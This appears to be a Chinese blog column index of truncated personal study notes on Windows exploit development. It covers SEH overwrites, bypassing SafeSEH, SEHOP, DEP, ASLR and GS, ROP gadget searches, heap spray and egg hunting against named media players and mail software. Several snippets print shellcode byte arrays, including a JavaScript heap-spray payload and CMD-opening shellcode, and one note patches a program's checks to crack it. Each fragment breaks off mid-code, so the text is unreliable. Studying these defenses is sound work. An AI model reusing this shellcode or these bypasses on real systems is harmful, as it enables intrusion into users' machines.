zcc1414的专栏

首先下面额指令都是我用到时记录的，可以说是经常用到吧先找到memdump.exe文件：C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe在CMD下 运行  memdump.exe 进程PID c:\abc然后进入console运行   msfpescan -p -m c:/abc

软件 自己下载。需要学习的是

SEH表的信息在内存中是加密存放的，所以突破它可能性不大······································································种类：1）软件DEP  就是前面学习过的 SafeSEH 目的是阻止利用SEH的攻击  与CPU硬件无关  利用软件模拟实现DEP 对操作系统提供一定的保护。现在就知道了 SafeSE

ActiveX是Microsoft对于一系列策略性面向对象程序技术和工具的称呼，其中主要的技术是组件对象模型（COM）。在有目录和其它支持的网络中，COM变成了分布式COM（DCOM）。通过y

var nop = unescape("%u9090"); var shellcode= "\u68fc\ubcc9\u6ba6\u6368\ud189\u8b4f\u8df4\uf47e"+"\udb33\u04b7\ue32b\ud233\u8b64\u305a\u4b8b\u8b0c"+"\u1c49\u098b\u518b\u8b18\u3452\ufa80\u7433\u8b

UNICODE  会自动插入NULL字符  1）覆盖ret控制寻找 形似   0x00nn00mm 的  jmp xxx 的地址  可以jmo 到shellcode执行2）基于SEH 控制EIP+SHORT JMP寻找 pop pop ret 不包含>7f 的入口地址 用来覆盖SEH header先将 nseh 置为 \xcc\xcc  再来寻找   两字节的  sho

Immunity  Debugger软件专门用于加速漏洞利用程序的开发，辅助漏洞挖掘以及恶意软件分析。它具备一个完整的图形用户界面，同时还配备了迄今为止最为强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融合于一体，它还附带了一套高度可定制的纯python图形算法，可用于帮助我们绘制出直观的函数体控制流以及函数中的各个基本块。只是学习记录，别无

easy rm to mp3 2

软件名称：  mailcarrier25环境：  XP SP3  正常qi

程序

python -c "print 'A'*64" |

我知道原理了：当int remove(){node->blink->flink = node->flink;//这个是flink   \x88\x06\x36\x00     这个是blink   //\x20\xf0\xfd\x7f";   //将系统RtlEnterCritucalSection 的 flink指向 我们的shellcode起始地址  造成DWORD S

本身是笔记··················································伪造SEH链表最后一项躲过SEHOP：具备条件：1 nseh 地址必须指向当前栈中，必须能够被4整除2 nseh 存放的异常处理记录作为SEH 链的最后一项，其异常处理函数指针必须指向中级异常处理函数3 突破 SEHOP检查后，异常程序还需要搞定SAFESEH4

环境  ：  WIN7    寻找 无ASLR+DEP 的DLL 去溢出!pvefindaddr rop 慢慢 搜  也可以 先搜索出 !pvefindaddr noaslr 才对指定然后查找合适的东西 EG:  cat rop.txt | grep -I "ADD ESP,4" > 1.txt因为是覆盖 SEH handler  所以 覆盖的 ROP小配件不是连续的，首先要先跳到

想要插入字符串  必须从后往前插入 如果大于4字节  并且保证最后为4字节0013FAF0 33DB xor ebx,ebx0013FAF2 53 push ebx0013FAF3 6A 61

终于开始看这个东西了，等了很久，迷失自己很久了～～～～～～～～～

JS 上

个人笔记  学习来源：

第一个工具 查询 进程虚拟空间内存   在根目录下 运行(补充 open solaris  可以用 pmap  -x           OS X  操作系统中可以用vmmap  或者vmmap )windows 用 Sysinternals Suite   不仅提供了 vmmap  还提供了很多有用的系统和进程的分析工具http://technet.microsoft.c

随便下载的  BlazeDVD 版本  来实验················首先程序破解：很简单  直接搜搜字符串    修改几个jmp  即可成功6030324B . /E9 35030000 jmp Configur.6030358560303250 > |68 C0003460 push Configur.603400C0

默认情况下  WIN7 安装这个软件  对这个软件   DEP是没开启的 ~_~    应该还是好破的很~_~  这里考虑特殊情况 DEP开启软件是一个音乐播放器，运行后  加载一个  MP3  才会加载漏洞DLL，并且 音乐播放完毕后，DLL没有卸载出

%PDF-1.11 0 obj<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 7 0 R>>endobj2 0 obj<< /Type /Outlines /Count 0>>endobj3 0 obj<< /Type /Pages /Kids [4 0 R] /Count 1>>

寻蛋技术是

下载地址  http://www.exploit-db.com/wp-content/themes/exploit/applications/2b0e04c048c9b84b12f742ae38136de6-minalic.zip

ASCII码表ASCII码大致可以分作三部分組成。第一部分是：ASCII非打印控制字符； 第二部分是：ASCII打印字符； 第三部分是：扩展ASCII打印字符。第一部分：ASCII非打印控制字符表ASCII表上的数字0–31分配给了控制字符，用于控制像打印机等一些外围设备。例如，12代表换页/新页功能。此命令指示打印机跳到下一页的开头。（参详ASCII码表中0-

SEHOP的全称是Structured Exception Handler Overwrite Protection（结构化异常处理覆盖保护），SEH攻击是指通过栈溢出或者其他漏洞，使用精心构造的数据覆盖结构化异常处理链表上面的某个节点或者多个节点，从而控制EIP（控制程序执行流程）。而SEHOP则是是微软针对这种攻击提出的一种安全防护方案。Server 2008 默认启用， VISTA 和

ASLR (Address Space Layout Randomization)通过加载程序时候不再使用固定的基址加载，从而干扰shellcode定位的一种保护机制windows Vista出现后，ASLR 才真正开始发挥作用VS2005 添加 /dynmicbase 就可以支持 ASLRVS2008 linker->Randomized Base Address 设置包含

#pragma strict_gs_check(on) 强制设置 GS保护  VS2008当缓冲区#include "stdafx.h"#include #pragma strict_gs_check(on)void f(char str[]){ char buff[4]; strcpy(buff,str);}int _tmain(int argc, _TCHAR* a

操作系统或程序在运行，难免会遇到各种各样的错误，如除零，非法内存访问，文件打开错误，内存不足，磁盘读写错误，外设操作失败。为了保证系统在遇到错误时不至于崩溃，仍能够健壮稳定地继续运行下去，windows会对运行在其中的程序提供一次补救的机会来处理错误这种机制就是异常处理机制。 S.E.H即异常处理结构体(Structure Exception Handler)，它是windows异常处理机制所采用

经常会忘记的··························

/*XP SP3 VS2008 SafeSEH 保护 利用程序的 map状态的的映射文件把它当成跳板 跳向我们的shellcode执行*/#include #include char shellcode[]="\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8

很多返回地址 存在这样一种情况：不同主机 不同路径。导致在覆盖时无法确定返回地址那么你去覆盖时 不能准确的覆盖上返回地址  导致溢出失败1  使用按字节相同的双字跳转2 使用堆中的地址下面引用 riusksk大牛的话：1、堆喷射堆块大小 ≈ 程序堆块分配大小，以减小堆空隙大小。 2、不能使用堆缓存块，否则可能破坏地址的可预测性，可通过申请6块相应大小的堆块来清空缓存

#include "stdafx.h"#include #include class failwest{public: char buf[200]; virtual void f1(void) { cout<<"Class Vtable test"; }};failwest overflow,*p;char shellcode[]="\x90\x90\x90\x

CDQ 用EDX 把EAX扩展为四位  这条语句在 eax losd   之类是装载指令  ESI->EAXstos   之类是存储指令  EAX->ESI

fs:7FFDF000nt!_TEBTEB at fs:7FFDF000 +0x000 NtTib // _NT_TIB +0x01c EnvironmentPointer // Ptr32 Void +0x020 ClientId // _CLIENT

#include "stdafx.h"#include #include #include char shellcode[]=//打开CMD的shellcode"\x55" //push ebp"\x8B\xEC" //mov ebp, esp"\x33\xC0" //xor eax, e

采用FS去定位API地址：FS寄存器指向当前活动线程的TEB结构（线程结构）偏移 说明000 指向SEH链指针004 线程堆栈顶部008 线程堆栈底部00C SubSystemTib010 FiberData014 ArbitraryUserPointer018 FS段寄存器在内存中的镜像地址020 进程PID024 线程ID02C 指向线程局部存储指针030 PEB结

对于栈中压入字符串请看：http://blog.youkuaiyun.com/zcc1414/article/details/9668907对于堆中压入字符串 也就是mov 堆,数据下面为例子：int main(){ __asm { push ebp mov ebp,esp xor ebx,ebx push ebx //尾部要加上 '\0' 也就是 0

对shellcode 进行加密：#include "stdio.h"char popup_general[]="\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C""\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53""\x68\x

例子：   mp3-millennium典型SEH  漏洞·····················一般我们都是直接去写文件，但是这个例子有检查文件属性的可以看到有检查机制所以构造 POC时要注意，不然没法制造异常用 !pvefindaddr pattern_create 6000构造POC  去制造异常发现异常，!exchain命令查看SEH链  然后